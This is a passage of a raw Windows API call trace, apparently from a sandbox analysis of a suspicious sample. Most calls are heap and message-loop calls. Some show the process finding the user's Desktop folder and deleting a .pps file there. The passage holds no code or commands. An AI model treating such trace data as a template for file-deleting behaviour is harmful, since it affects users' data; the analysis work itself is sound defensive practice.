dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0188.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0188.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.635] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0188.635] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.635] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0188.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0188.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.635] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0188.635] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0188.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0188.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0188.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0188.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0188.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.636] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0188.636] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0188.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0188.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0188.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0188.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0188.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0188.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0188.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0188.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0188.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0188.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0188.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0188.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0188.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0188.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0188.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0188.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0188.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0188.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0188.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0188.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0188.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0188.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0188.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0188.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0188.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0188.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0188.638] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.638] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.638] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0188.638] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0188.638] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0188.638] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0188.638] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0188.639] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.639] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.639] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.639] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.639] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.639] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.639] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0188.639] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.639] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0188.639] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.639] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.639] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.639] CryptReleaseContext (hProv=0xaa3868, dwFlags=0x0) returned 1 [0188.639] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.640] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.640] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.640] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.640] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.640] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.640] FreeLibrary (hLibModule=0x74d40000) returned 1 [0188.640] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.640] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.640] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.640] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.641] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.641] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0188.641] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0188.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0188.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0188.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b88 [0188.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0188.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0188.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa908 [0188.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0188.642] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0188.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0188.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0188.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0188.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0188.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0188.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0188.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0188.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0188.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0188.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0188.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0188.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0188.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0188.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0188.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0188.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0188.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0188.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0188.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0188.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0188.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd0) returned 0x2416f30 [0188.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0188.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0188.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0188.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0188.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0188.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x64) returned 0x24202f0 [0188.643] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/OPqP3gN.pps", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OPqP3gN.pps", lpFilePart=0x8bedfc*="OPqP3gN.pps") returned 0x31 [0188.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0188.643] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OPqP3gN.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\opqp3gn.pps")) returned 0x20 [0188.643] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OPqP3gN.pps", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdad68f60, ftCreationTime.dwHighDateTime=0x1d4c978, ftLastAccessTime.dwLowDateTime=0xbd16f080, ftLastAccessTime.dwHighDateTime=0x1d4c7cc, ftLastWriteTime.dwLowDateTime=0xbd16f080, ftLastWriteTime.dwHighDateTime=0x1d4c7cc, nFileSizeHigh=0x0, nFileSizeLow=0x172a0, dwReserved0=0x6d, dwReserved1=0x4, cFileName="OPqP3gN.pps", cAlternateFileName="")) returned 0xaa5860 [0188.643] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OPqP3gN.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\opqp3gn.pps")) returned 1 [0188.646] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdad68f60, ftCreationTime.dwHighDateTime=0x1d4c978, ftLastAccessTime.dwLowDateTime=0xbd16f080, ftLastAccessTime.dwHighDateTime=0x1d4c7cc, ftLastWriteTime.dwLowDateTime=0xbd16f080, ftLastWriteTime.dwHighDateTime=0x1d4c7cc, nFileSizeHigh=0x0, nFileSizeLow=0x172a0, dwReserved0=0x6d, dwReserved1=0x4, cFileName="OPqP3gN.pps", cAlternateFileName="")) returned 0 [0188.646] FindClose (in: hFindFile=0xaa5860 | out: hFindFile=0xaa5860) returned 1 [0188.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0188.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0188.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0188.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0188.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0188.646] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0188.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0188.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0188.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0188.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0188.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0188.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0188.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0188.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0188.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0188.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0188.647] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0188.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0188.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0188.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa908 [0188.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0188.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0188.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a96d8 [0188.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0188.647] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0188.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0188.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0188.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0188.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0188.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0188.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0188.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0188.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0188.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0188.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0188.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0188.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0188.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0188.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0188.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0188.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0188.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0188.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0188.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0188.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0188.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd0) returned 0x2416f30 [0188.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0188.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0188.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0188.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0188.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0188.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0188.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0188.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0188.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0188.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0188.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0188.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0188.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0188.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0188.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0188.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0188.649] RtlAllocateHeap (HeapHandle=0x25c0000, 